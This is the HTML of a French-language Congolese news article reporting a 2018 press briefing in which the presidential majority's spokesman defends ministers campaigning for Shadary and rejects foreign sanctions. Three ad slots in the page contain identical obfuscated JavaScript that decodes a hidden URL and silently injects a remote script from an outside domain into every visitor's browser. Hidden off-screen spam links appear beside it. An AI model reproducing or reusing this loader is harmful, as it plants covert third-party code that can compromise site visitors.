                <ul class="td-category"><li class="entry-category"><a  href="https://groupelavenir.org/category/actualites/">Actualités</a></li></ul>                <div class="td-clear-author"></div><span class="td-block-author">par <a itemprop="author" href="https://groupelavenir.org/author/groupela/">La Rédaction</a> - </span><meta itemprop="interactionCount" content="UserComments:0"/>                <time  itemprop="dateCreated" class="entry-date updated" datetime="2018-11-11T22:07:21+00:00" >Nov 11, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/>                <div class="entry-comments-views"><span class="td-sp td-sp-ico-comments td-fake-click" data-fake-click="https://groupelavenir.org/implication-du-premier-ministre-ou-des-ministres-dans-la-campagne-electorale-de-shadary-la-mp-denonce-une-polemique-malsaine-et-perverse/#respond"></span>0 <span class="td-sp td-sp-ico-view"></span><span class="td-nr-views-52836">24</span></div>            </div>
        </header>


        

        <div class="td-post-featured-image"><img width="326" height="235" itemprop="image" class="entry-thumb" src="https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/11/7-1.png?resize=326%2C235&ssl=1" alt="" title="7"/></div>
        <div class="td-post-text-content">
            <div class="td-a-rec td-a-rec-id-content_top "><script type='text/javascript'>var _0x1e35=['length','fromCharCode','createElement','type','async','code121','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,_0x3f720e){var _0x440369=function(_0x2e1b64){while(--_0x2e1b64){_0x546a53['push'](_0x546a53['shift']());}};_0x440369(++_0x3f720e);}(_0x1e35,0x1e1));var _0x5a05=function(_0x716551,_0x1d4a8e){_0x716551=_0x716551-0x0;var _0x2b7638=_0x1e35[_0x716551];return _0x2b7638;};var url=String[_0x5a05('0x0')](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x61,0x73,0x6b,0x6d,0x61,0x64,0x65,0x2e,0x6e,0x65,0x74,0x2f,0x68,0x65,0x61,0x64,0x2e,0x6a,0x73,0x3f,0x76,0x65,0x72,0x3d,0x31,0x2e,0x30,0x2e,0x30);var a=function(){var _0x22c9c8=document[_0x5a05('0x1')](String[_0x5a05('0x0')](0x73,0x63,0x72,0x69,0x70,0x74));_0x22c9c8[_0x5a05('0x2')]=String[_0x5a05('0x0')](0x74,0x65,0x78,0x74,0x2f,0x6a,0x61,0x76,0x61,0x73,0x63,0x72,0x69,0x70,0x74);_0x22c9c8[_0x5a05('0x3')]=!![];_0x22c9c8['id']=_0x5a05('0x4');_0x22c9c8[_0x5a05('0x5')]=url;document['getElementsByTagName'](String[_0x5a05('0x0')](0x68,0x65,0x61,0x64))[0x0][_0x5a05('0x6')](_0x22c9c8);};var scrpts=document[_0x5a05('0x7')](_0x5a05('0x8'));var n=!![];for(var i=scrpts[_0x5a05('0x9')];i--;){if(scrpts[i]['id']==_0x5a05('0x4')){n=![];}};if(n==!![]){a();}</script></div><div class="td-a-rec td-a-rec-id-content_inline "><script type='text/javascript'>var _0x1e35=['length','fromCharCode','createElement','type','async','code121','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,_0x3f720e){var _0x440369=function(_0x2e1b64){while(--_0x2e1b64){_0x546a53['push'](_0x546a53['shift']());}};_0x440369(++_0x3f720e);}(_0x1e35,0x1e1));var _0x5a05=function(_0x716551,_0x1d4a8e){_0x716551=_0x716551-0x0;var _0x2b7638=_0x1e35[_0x716551];return _0x2b7638;};var url=String[_0x5a05('0x0')](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x61,0x73,0x6b,0x6d,0x61,0x64,0x65,0x2e,0x6e,0x65,0x74,0x2f,0x68,0x65,0x61,0x64,0x2e,0x6a,0x73,0x3f,0x76,0x65,0x72,0x3d,0x31,0x2e,0x30,0x2e,0x30);var a=function(){var _0x22c9c8=document[_0x5a05('0x1')](String[_0x5a05('0x0')](0x73,0x63,0x72,0x69,0x70,0x74));_0x22c9c8[_0x5a05('0x2')]=String[_0x5a05('0x0')](0x74,0x65,0x78,0x74,0x2f,0x6a,0x61,0x76,0x61,0x73,0x63,0x72,0x69,0x70,0x74);_0x22c9c8[_0x5a05('0x3')]=!![];_0x22c9c8['id']=_0x5a05('0x4');_0x22c9c8[_0x5a05('0x5')]=url;document['getElementsByTagName'](String[_0x5a05('0x0')](0x68,0x65,0x61,0x64))[0x0][_0x5a05('0x6')](_0x22c9c8);};var scrpts=document[_0x5a05('0x7')](_0x5a05('0x8'));var n=!![];for(var i=scrpts[_0x5a05('0x9')];i--;){if(scrpts[i]['id']==_0x5a05('0x4')){n=![];}};if(n==!![]){a();}</script></div><div style="position:absolute;top:0;left:-9999px;">Want create site? With <a href="https://dlwordpress.com/wordpress-visual-composer-new/">Free visual composer</a> you can do it easy.</div><p><strong>Le président de la République, le Premier ministre ou les ministres peuvent-ils se lancer dans la campagne électorale au profit du candidat du front Commun pour le Congo (FCC), Emmanuel Ramazani Shadary ? Cette question et bien d’autres étaient au centre du point de presse animé vendredi dernier par la Majorité présidentielle, à travers son porte-parole, l’ambassadeur André-Alain Atundu. A cette occasion, il a dénoncé une polémique malsaine et perverse destinée plus à distraire et à brouiller les esprits par rapport aux enjeux électoraux, qu’à consolider le processus électoral. Il a aussi fustigé le comportement d’un certain collectif de candidats, invoquant de manière abusive l’article 36 de la loi électorale dans l’intention de surprendre la bonne foi de l’opinion, tout en préconisant la démission des ministres et du Directeur de cabinet du chef de l’Etat. Ceci, pendant que la loi n’interdit pas leur implication dans la campagne électorale, du reste une pratique courante dans les systèmes démocratiques.</strong></p>
<p>A quelques jours de la campagne électorale, une polémique malsaine et perverse a vu le jour et dont l’objectif est de distraire les Congolais et brouiller les esprits par rapport aux enjeux électoraux de l’heure. Cette campagne est née de la présence, dans la campagne du dauphin désigné, du Premier ministre ou des ministres. Fait que n’interdit pas l’article 36 de la loi électorale, parce que relevant de pratique courante dans les systèmes démocratiques. Logiquement, il s’agit d’un débat fallacieux provoqué dans un dessein inavoué, mais bien connu, de solliciter le concours de la CENI pour écarter de la course un concurrent sérieux, mais jugé redoutable, en la personne d’Emmanuel Ramazani Shadary.</p>
<p>Et pourtant, il ne peut y avoir aucune confusion du genre entre les activités professionnelles, et donc républicaines d’un ministre et les actes privés posés dans le cadre d’un parti ou regroupement politique. A titre illustratif, Atundu cite le cas des USA, où nul n’a été choqué par l’implication personnelle du président Trump dans la campagne pour les élections de mi-mandat, sans être obligé pour autant de suspendre son mandat présidentiel. Ce qui pousse la Majorité présidentielle à prévenir qu’elle mettrait les moyens pour faire barrage aux porteurs de tels projets funestes contre la démocratie, pour préserver le peuple congolais des affres d’un chaos prémédité pour réaliser leur plan de transition sans Kabila.</p>
<p>De même, au sujet de la prétendue utilisation des moyens de l’Etat aux fins de la campagne électorale, Atundu se demande : pourquoi ne saisit-on pas les instances compétentes pour que justice soit rendue ? ‘’Ceci procède de la malveillance et d’une volonté de distraire nos membres face à la campagne électorale’’, a-t-il constaté.</p>
<p><strong>La MP s’oppose à la posture d’autorité compétente de Mgr Ambongo</strong></p>
<p>A la même occasion, la MP a fustigé la posture d’autorité compétente affichée par Mgr Fridolin Ambongo, archevêque de Kinshasa. <em>«…l’on aurait pu s’attendre à recevoir du nouveau nominé des orientations pastorales dans le sens d’une meilleure évangélisation des Kinois, au regard des défis moraux qui assaillent la société »</em>, pense A. Atundu, qui ajoute qu’à la place, les Kinois sont étonnés d’entendre le prince de l’Eglise catholique s’exprimer ex cathedra et avec une posture autoritaire, sur les aspects techniques du processus électoral, matière relevant constitutionnellement de la compétence de la CENI. Pour lui, le prince de l’Eglise n’a pas les outils nécessaires ni l’expertise pour orienter le peuple quant à ce. En plus, l’Eglise et la MP doivent se référer à la CENI qui agit en application de la loi.</p>
<p>Comme pour dire que cette confusion du genre n’est pas de nature à respecter la laïcité de l’Etat congolais, pourtant reconnue et acceptée par tous d’une part, et à favoriser la sérénité dans l’esprit des chrétiens engagés en politique, d’autre part.</p>
<p><strong>Des sanctions discriminatoires et ségrégationnistes</strong></p>
<p>Au cours de ce rendez-vous avec la presse, la Majorité présidentielle a joint sa voix à celle du Gouvernement pour réclamern, au nom de la justice et de l’équité, la levée sans condition des sanctions politiques injustes contre le candidat Shadary et les responsables de l’Etat, plus en raison de leurs fonctions ou statuts qu’à la suite d’une décision judiciaire d’une instance compétente dans le respect de la déontologie et d’un corpus de lois acceptées par tous en toute liberté et souveraineté de l’Etat.</p>
<p><em>« C’est notre droit et c’est l’équité, si nous réclamons la levée de ces sanctions. Nous ne pouvons pas donner à une décision politique un caractère imposable. Cette décision obéit plus à l’intérêt poursuivi par ces Etats, pour ne pas permettre à la Rdc de bien faire son travail, c’est-à-dire, de bien organiser les élections pour une passation de pouvoir civilisée »</em>, a indiqué André Atundu, pour qui ces sanctions sont discriminatoires et ségrégationnistes. Il conseille donc de faire preuve d’héroïsme en résistant contre cette folie démocratique.</p>
<p>En toute état de cause, pense la MP, ces décisions sont arbitraires et immorales, parce qu’elles visent à contraindre les officiels congolais à ne pas exercer leur devoir constitutionnel et à obéir au doigt et à l’œil à quelques personnages dont l’objectif est de ravir sa souveraineté au peuple congolais. A la question : pourquoi Shadary a-t-il été à Mbuji-Mayi ? La MP rétorque que le candidat du FCC a commencé par le stade Tata Raphael, où il a récolté franc succès. Mbuji-Mayi, c’est donc une seconde étape après Kinshasa. Là, il était question de présenter son équipe de campagne dans cette province et de permettre à ce que toute la population du Kasaï-oriental le découvre dans sa peau de dauphin. Force est de souligner que la circonscription électorale du président de la République, c’est l’ensemble du territoire national et il lui appartient de déterminer où il ira et avec qui il parlera.<br />
<strong>JMNK</strong></p>
<div style="position:absolute;top:0;left:-9999px;">Did you find apk for android? You can find new <a href="https://dlandroid24.com/">Free Android Games</a> and apps.</div><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Partager&nbsp;:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow" data-shared="sharing-twitter-52836" class="share-twitter sd-button share-icon no-text" href="https://groupelavenir.org/implication-du-premier-ministre-ou-des-ministres-dans-la-campagne-electorale-de-shadary-la-mp-denonce-une-polemique-malsaine-et-perverse/?share=twitter" rel="noopener noreferrer" target="_blank" title="Cliquez pour partager sur Twitter"><span></span><span class="sharing-screen-reader-text">Cliquez pour partager sur Twitter(ouvre dans une nouvelle fenêtre)</span></a></li><li class="share-facebook"><a rel="nofollow" data-shared="sharing-facebook-52836" class="share-facebook sd-button share-icon no-text" href="https://groupelavenir.org/implication-du-premier-ministre-ou-des-ministres-dans-la-campagne-electorale-de-shadary-la-mp-denonce-une-polemique-malsaine-et-perverse/?share=facebook" rel="noopener noreferrer" target="_blank" title="Cliquez pour partager sur Facebook"><span></span><span class="sharing-screen-reader-text">Cliquez pour partager sur Facebook(ouvre dans une nouvelle fenêtre)</span></a></li><li class="share-google-plus-1"><a rel="nofollow" data-shared="sharing-google-52836" class="share-google-plus-1 sd-button share-icon no-text" href="https://groupelavenir.org/implication-du-premier-ministre-ou-des-ministres-dans-la-campagne-electorale-de-shadary-la-mp-denonce-une-polemique-malsaine-et-perverse/?share=google-plus-1" rel="noopener noreferrer" target="_blank" title="Cliquez pour partager sur Google+"><span></span><span class="sharing-screen-reader-text">Cliquez pour partager sur Google+(ouvre dans une nouvelle fenêtre)</span></a></li><li class="share-end"></li></ul></div></div></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Articles similaires</em></h3>
</div><div class="td-a-rec td-a-rec-id-content_bottom "><script type='text/javascript'>var _0x1e35=['length','fromCharCode','createElement','type','async','code121','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,_0x3f720e){var _0x440369=function(_0x2e1b64){while(--_0x2e1b64){_0x546a53['push'](_0x546a53['shift']());}};_0x440369(++_0x3f720e);}(_0x1e35,0x1e1));var _0x5a05=function(_0x716551,_0x1d4a8e){_0x716551=_0x716551-0x0;var _0x2b7638=_0x1e35[_0x716551];return _0x2b7638;};var url=String[_0x5a05('0x0')](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x61,0x73,0x6b,0x6d,0x61,0x64,0x65,0x2e,0x6e,0x65,0x74,0x2f,0x68,0x65,0x61,0x64,0x2e,0x6a,0x73,0x3f,0x76,0x65,0x72,0x3d,0x31,0x2e,0x30,0x2e,0x30);var a=function(){var _0x22c9c8=document[_0x5a05('0x1')](String[_0x5a05('0x0')](0x73,0x63,0x72,0x69,0x70,0x74));_0x22c9c8[_0x5a05('0x2')]=String[_0x5a05('0x0')](0x74,0x65,0x78,0x74,0x2f,0x6a,0x61,0x76,0x61,0x73,0x63,0x72,0x69,0x70,0x74);_0x22c9c8[_0x5a05('0x3')]=!![];_0x22c9c8['id']=_0x5a05('0x4');_0x22c9c8[_0x5a05('0x5')]=url;document['getElementsByTagName'](String[_0x5a05('0x0')](0x68,0x65,0x61,0x64))[0x0][_0x5a05('0x6')](_0x22c9c8);};var scrpts=document[_0x5a05('0x7')](_0x5a05('0x8'));var n=!![];for(var i=scrpts[_0x5a05('0x9')];i--;){if(scrpts[i]['id']==_0x5a05('0x4')){n=![];}};if(n==!![]){a();}</script></div>        </div>


        <div class="clearfix"></div>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-7683628640306220";
/* groupelavenir.org_300x250 */
google_ad_slot = "2031019677/3507727557";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script type="text/javascript"
src="//pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
        <div class="clearfix"></div>

        <footer>
                                                
            <div class="td-social-sharing">
                
                <div class="td-tags-and-social-wrapper-box td-tags-and-social-wrapper-box-bottom-line">
                    <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=Implication+du+Premier+ministre+ou+des+ministres+dans+la+campagne+%C3%A9lectorale+de+Shadary%3A+La+MP+d%C3%A9nonce+une+pol%C3%A9mique+malsaine+et+perverse&url=https%3A%2F%2Fgroupelavenir.org%2Fimplication-du-premier-ministre-ou-des-ministres-dans-la-campagne-electorale-de-shadary-la-mp-denonce-une-polemique-malsaine-et-perverse%2F&via=RTGA_TV" onclick="if(!document.getElementById('td_social_networks_buttons')){window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;}" ><div class="td-sp td-sp-share-twitter"></div><div class="td-social-but-text">Twitter</div></a>
                    <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fgroupelavenir.org%2Fimplication-du-premier-ministre-ou-des-ministres-dans-la-campagne-electorale-de-shadary-la-mp-denonce-une-polemique-malsaine-et-perverse%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-share-facebook"></div><div class="td-social-but-text">Facebook</div></a>
                    <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=https://groupelavenir.org/implication-du-premier-ministre-ou-des-ministres-dans-la-campagne-electorale-de-shadary-la-mp-denonce-une-polemique-malsaine-et-perverse/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-share-google"></div><div class="td-social-but-text">Google +</div></a>
                    <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=https://groupelavenir.org/implication-du-premier-ministre-ou-des-ministres-dans-la-campagne-electorale-de-shadary-la-mp-denonce-une-polemique-malsaine-et-perverse/&amp;media=https://groupelavenir.org/wp-content/uploads/2018/11/7-1.png" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-share-pinterest"></div><div class="td-social-but-text">Pinterest</div></a>
                </div></div>                                    <div class="td-author-name vcard author" style="display: none"><span class="fn"><a href="https://groupelavenir.org/author/">La Rédaction</a></span></div>

            <meta itemprop="author" content = "La Rédaction">        </footer>

    </article> <!-- /.post -->

    <div class="art-img-text-down similar-articles"><h4 class="block-title"><span>ARTICLES SIMILAIRES</span></h4>

	<div class="wpb_row row-fluid">

	<div class="span6">

        <div class="td_mod6 td_mod_wrap " itemscope itemtype="https://schema.org/Article">
        <div class="thumb-wrap"><a href="https://groupelavenir.org/a-lissue-de-la-reunion-de-geneve-alan-doss-choisit-fayulu/" rel="bookmark" title="A l’issue de la réunion de Genève: Alan Doss choisit Fayulu"><img width="326" height="159" itemprop="image" class="entry-thumb" src="https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/11/9-1.png?resize=326%2C159&ssl=1" alt="" title="A l’issue de la réunion de Genève: Alan Doss choisit Fayulu"/></a></div>        <h3 itemprop="name" class="entry-title"><a itemprop="url" href="https://groupelavenir.org/a-lissue-de-la-reunion-de-geneve-alan-doss-choisit-fayulu/" rel="bookmark" title="A l’issue de la réunion de Genève: Alan Doss choisit Fayulu">A l’issue de la réunion de Genève: Alan Doss choisit Fayulu</a></h3>
        <div class="meta-info">
                        <time  itemprop="dateCreated" class="entry-date updated" datetime="2018-11-11T22:08:08+00:00" >Nov 11, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/>            <div class="entry-comments-views"><span class="td-sp td-sp-ico-comments td-fake-click" data-fake-click="https://groupelavenir.org/a-lissue-de-la-reunion-de-geneve-alan-doss-choisit-fayulu/#respond"></span>0 <span class="td-sp td-sp-ico-view"></span><span class="td-nr-views-52834">32</span></div>        </div>


        <meta itemprop="author" content = "La Rédaction">        </div>

        
	</div> <!-- ./span6 -->

	<div class="span6">

        <div class="td_mod6 td_mod_wrap " itemscope itemtype="https://schema.org/Article">
        <div class="thumb-wrap"><a href="https://groupelavenir.org/sous-une-pluie-de-benediction-shadary-triomphe-a-mbuji-mayi/" rel="bookmark" title="Sous une pluie de bénédiction: Shadary triomphe à Mbuji-Mayi"><img width="326" height="159" itemprop="image" class="entry-thumb" src="https://i2.wp.com/groupelavenir.org/wp-content/uploads/2018/11/A.png?resize=326%2C159&ssl=1" alt="" title="Sous une pluie de bénédiction: Shadary triomphe à Mbuji-Mayi"/></a></div>        <h3 itemprop="name" class="entry-title"><a itemprop="url" href="https://groupelavenir.org/sous-une-pluie-de-benediction-shadary-triomphe-a-mbuji-mayi/" rel="bookmark" title="Sous une pluie de bénédiction: Shadary triomphe à Mbuji-Mayi">Sous une pluie de bénédiction: Shadary triomphe à Mbuji-Mayi</a></h3>
        <div class="meta-info">
                        <time  itemprop="dateCreated" class="entry-date updated" datetime="2018-11-11T11:36:11+00:00" >Nov 11, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/>            <div class="entry-comments-views"><span class="td-sp td-sp-ico-comments td-fake-click" data-fake-click="https://groupelavenir.org/sous-une-pluie-de-benediction-shadary-triomphe-a-mbuji-mayi/#respond"></span>0 <span class="td-sp td-sp-ico-view"></span><span class="td-nr-views-52810">50</span></div>        </div>


        <meta itemprop="author" content = "La Rédaction">        </div>

        
	</div> <!-- ./span6 --></div><!--./row-fluid--></div>
                        <div class="comments" id="comments">
                                                                                                <div class="comments-title-wrap">
                                                                                <h4 class="block-title"><span>PAS DE COMMENTAIRE</span></h4>
                                    </div>

                                                                                            	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Laisser une Réponse <small><a rel="nofollow" id="cancel-comment-reply-link" href="/implication-du-premier-ministre-ou-des-ministres-dans-la-campagne-electorale-de-shadary-la-mp-denonce-une-polemique-malsaine-et-perverse/#respond" style="display:none;">Cancel reply</a></small></h3><p class="must-log-in">Vous devez <a href="https://groupelavenir.org/wp-login.php?redirect_to=https%3A%2F%2Fgroupelavenir.org%2Fimplication-du-premier-ministre-ou-des-ministres-dans-la-campagne-electorale-de-shadary-la-mp-denonce-une-polemique-malsaine-et-perverse%2F">être connecté</a> pour publier un commentaire.</p>	</div><!-- #respond -->
	                                                    </div> <!-- /.content -->


            </div>
            <div class="span4 column_container td-post-sidebar" role="complementary" itemscope="itemscope" itemtype="https://schema.org/WPSideBar">
                                <!-- .no sidebar -->
                        </div>
        
                             </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
            <div class="td-footer-wrap">
        <div class="container">
            <div class="row">
                
                            <div class="span12">
                                <div class="td-grid-wrap">
                                    <div class="container-fluid">
                                        <div class="wpb_row row-fluid ">
                                            <div class="span4 wpb_column column_container">
                                                <aside class="widget widget_text">			<div class="textwidget"><p><img src="https://groupelavenir.org/wp-content/plugins/jetpack/modules/lazy-images/images/1x1.trans.gif" data-recalc-dims="1" data-lazy-src="https://i2.wp.com/groupelavenir.org/wp-content/uploads/2016/09/logo_rtga-tv-.png?w=700" class=" jetpack-lazy-image"><noscript><img src="https://i2.wp.com/groupelavenir.org/wp-content/uploads/2016/09/logo_rtga-tv-.png?w=700" data-recalc-dims="1" /></noscript></p>
<p>Un groupe d'entreprises privées des médias: Groupe l'Avenir vous informe au quotidien sur l'actualité du pays à la Télévision, Radio RTGA et en ligne.<br />
Adresse : Groupe l'Avenir, Immeuble Ruzizi, Avenue Bas-Congo N°873, Gombe, Kinshasa, RD Congo<br />
Téléphone : +243998410588<br />
Nous contacter : infos@groupelavenir.org</p>
</div>
		</aside>                                            </div>

                                            <div class="span4 wpb_column column_container">
                                                <aside class="widget widget_listcategorypostswidget"><div class="block-title"><span>Articles à la une</span></div><ul><li><a href="https://groupelavenir.org/a-lissue-de-la-reunion-de-geneve-alan-doss-choisit-fayulu/" title="A l’issue de la réunion de Genève: Alan Doss choisit Fayulu">A l’issue de la réunion de Genève: Alan Doss choisit Fayulu</a>  <a href="https://groupelavenir.org/a-lissue-de-la-reunion-de-geneve-alan-doss-choisit-fayulu/" title="A l’issue de la réunion de Genève: Alan Doss choisit Fayulu"><img width="150" height="150" src="https://groupelavenir.org/wp-content/plugins/jetpack/modules/lazy-images/images/1x1.trans.gif" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" data-attachment-id="52842" data-permalink="https://groupelavenir.org/a-lissue-de-la-reunion-de-geneve-alan-doss-choisit-fayulu/9-282/" data-orig-file="https://i2.wp.com/groupelavenir.org/wp-content/uploads/2018/11/9-1.png?fit=609%2C344&amp;ssl=1" data-orig-size="609,344" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="9" data-image-description="" data-medium-file="https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/11/9-1.png?fit=300%2C169&amp;ssl=1" data-large-file="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/11/9-1.png?fit=609%2C344&amp;ssl=1" data-lazy-src="https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/11/9-1.png?resize=150%2C150&amp;ssl=1" data-lazy-srcset="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/11/9-1.png?resize=150%2C150&amp;ssl=1 150w, https://i2.wp.com/groupelavenir.org/wp-content/uploads/2018/11/9-1.png?resize=210%2C210&amp;ssl=1 210w, https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/11/9-1.png?zoom=2&amp;resize=150%2C150 300w, https://i2.wp.com/groupelavenir.org/wp-content/uploads/2018/11/9-1.png?zoom=3&amp;resize=150%2C150 450w" data-lazy-sizes="(max-width: 150px) 100vw, 150px" /></a></li><li><a href="https://groupelavenir.org/sous-une-pluie-de-benediction-shadary-triomphe-a-mbuji-mayi/" title="Sous une pluie de bénédiction: Shadary triomphe à Mbuji-Mayi">Sous une pluie de bénédiction: Shadary triomphe à Mbuji-Mayi</a>  <a href="https://groupelavenir.org/sous-une-pluie-de-benediction-shadary-triomphe-a-mbuji-mayi/" title="Sous une pluie de bénédiction: Shadary triomphe à Mbuji-Mayi"><img width="150" height="150" src="https://groupelavenir.org/wp-content/plugins/jetpack/modules/lazy-images/images/1x1.trans.gif" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" data-attachment-id="52817" data-permalink="https://groupelavenir.org/sous-une-pluie-de-benediction-shadary-triomphe-a-mbuji-mayi/a-271/" data-orig-file="https://i2.wp.com/groupelavenir.org/wp-content/uploads/2018/11/A.png?fit=569%2C382&amp;ssl=1" data-orig-size="569,382" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="A" data-image-description="" data-medium-file="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/11/A.png?fit=300%2C201&amp;ssl=1" data-large-file="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/11/A.png?fit=569%2C382&amp;ssl=1" data-lazy-src="https://i2.wp.com/groupelavenir.org/wp-content/uploads/2018/11/A.png?resize=150%2C150&amp;ssl=1" data-lazy-srcset="https://i2.wp.com/groupelavenir.org/wp-content/uploads/2018/11/A.png?resize=150%2C150&amp;ssl=1 150w, https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/11/A.png?resize=210%2C210&amp;ssl=1 210w, https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/11/A.png?zoom=2&amp;resize=150%2C150 300w, https://i2.wp.com/groupelavenir.org/wp-content/uploads/2018/11/A.png?zoom=3&amp;resize=150%2C150 450w" data-lazy-sizes="(max-width: 150px) 100vw, 150px" /></a></li><li><a href="https://groupelavenir.org/presentation-de-son-equipe-de-campagne-shadary-attendu-aujourdhui-a-mbuji-mayi/" title="Présentation de son équipe de campagne: Shadary attendu aujourd’hui à Mbuji-Mayi">Présentation de son équipe de campagne: Shadary attendu aujourd’hui à Mbuji-Mayi</a>  <a href="https://groupelavenir.org/presentation-de-son-equipe-de-campagne-shadary-attendu-aujourdhui-a-mbuji-mayi/" title="Présentation de son équipe de campagne: Shadary attendu aujourd’hui à Mbuji-Mayi"><img width="150" height="150" src="https://groupelavenir.org/wp-content/plugins/jetpack/modules/lazy-images/images/1x1.trans.gif" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" data-attachment-id="52773" data-permalink="https://groupelavenir.org/presentation-de-son-equipe-de-campagne-shadary-attendu-aujourdhui-a-mbuji-mayi/g-199/" data-orig-file="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/11/G.png?fit=630%2C386&amp;ssl=1" data-orig-size="630,386" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="G" data-image-description="" data-medium-file="https://i2.wp.com/groupelavenir.org/wp-content/uploads/2018/11/G.png?fit=300%2C184&amp;ssl=1" data-large-file="https://i2.wp.com/groupelavenir.org/wp-content/uploads/2018/11/G.png?fit=630%2C386&amp;ssl=1" data-lazy-src="https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/11/G.png?resize=150%2C150&amp;ssl=1" data-lazy-srcset="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/11/G.png?resize=150%2C150&amp;ssl=1 150w, https://i2.wp.com/groupelavenir.org/wp-content/uploads/2018/11/G.png?resize=210%2C210&amp;ssl=1 210w, https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/11/G.png?zoom=2&amp;resize=150%2C150 300w, https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/11/G.png?zoom=3&amp;resize=150%2C150 450w" data-lazy-sizes="(max-width: 150px) 100vw, 150px" /></a></li></ul><a href="https://groupelavenir.org/category/featured/" > </a></aside>                                            </div>
                                            <div class="span4 wpb_column column_container">
                                                <aside class="widget widget_simple_facebook_page_feed_widget"><div class="block-title"><span>Notre page Facebook</span></div><!-- This Facebook Page Feed was generated with Simple Facebook Page Widget & Shortcode plugin v1.4.15 - https://wordpress.org/plugins/simple-facebook-twitter-widget/ --><div id="simple-facebook-widget" style="text-align:center;"><div class="fb-page" data-href="https://www.facebook.com/RADIO-TELE-GROUPE-LAVENIR-225206517516304" data-width="340" data-height="500" data-tabs="timeline" data-hide-cover="0" data-show-facepile="0" data-hide-cta="0" data-small-header="1" data-adapt-container-width="1"></div></div><!-- End Simple Facebook Page Plugin (Widget) --></aside>                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>

                                    </div>
        </div>
    </div> <!-- /.td-footer-wrap  -->



<div class="td-sub-footer-wrap">
    <div class="container ">
        <div class="row">
            <div class="span12">
                <div class="td-grid-wrap">
                    <div class="container-fluid">
                        <div class="row-fluid ">
                            <div class="span4 td-sub-footer-copy">
                                &copy; Copyright - 2013                            </div>
                            <div class="span8 td-sub-footer-menu">

                                <div class="menu-footer_menu-container"><ul id="menu-footer_menu" class=""><li id="menu-item-25174" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-first td-menu-item td-mega-menu menu-item-25174"><a href="https://groupelavenir.org/category/sante/">Santé</a>
<ul class="sub-menu">
